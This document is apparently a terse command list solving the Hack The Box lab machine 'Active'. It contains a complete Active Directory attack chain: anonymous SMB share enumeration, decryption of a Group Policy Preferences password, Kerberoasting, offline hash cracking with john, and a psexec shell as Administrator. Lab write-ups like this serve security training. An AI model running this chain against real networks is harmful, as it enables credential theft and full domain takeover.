Active

crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP>	<DOMAIN>

smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smbmap -H <IP> --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
mv <IP>-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml groups.xml

gpp-decrypt '<CPASSWORD>'

crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>'
crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>' --shares
smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' -r Users/SVC_TGS/Desktop/user.txt

smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' --download Users/SVC_TGS/Desktop/user.txt
mv <IP>-Users_SVC_TGS_Desktop_user.txt user.txt
cat user.txt

rpcclient -U "SVC_TGS%<PASSWORD>" <IP>
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomusers'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomgroups'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querygroupmem 0x200'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'queryuser 0x1f4'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querydispinfo'
echo SVC_TGS > users.txt

GetNPUsers.py active.htb/ --no-pass -usersfile users.txt

kerbrute userenum --dc <IP> -d active.htb /usr/share/Seclists/Usernames/Names/names.txt

ntpdate <IP>

GetUserSPN.py active.htb/SVC_TGS:<PASSWORD> -request

echo '<HASH>' > hash
john -w:/usr/share/wordlists/rockyou.txt hash

crackmapexec smb <IP> -u 'Administrator' -p '<PASSWORD>'
psexec.py 'active.htb/Administrator:<PASSWORD>@<IP>' cmd.exe
whoami

type C:\Users\Administrator\Desktop\root.txt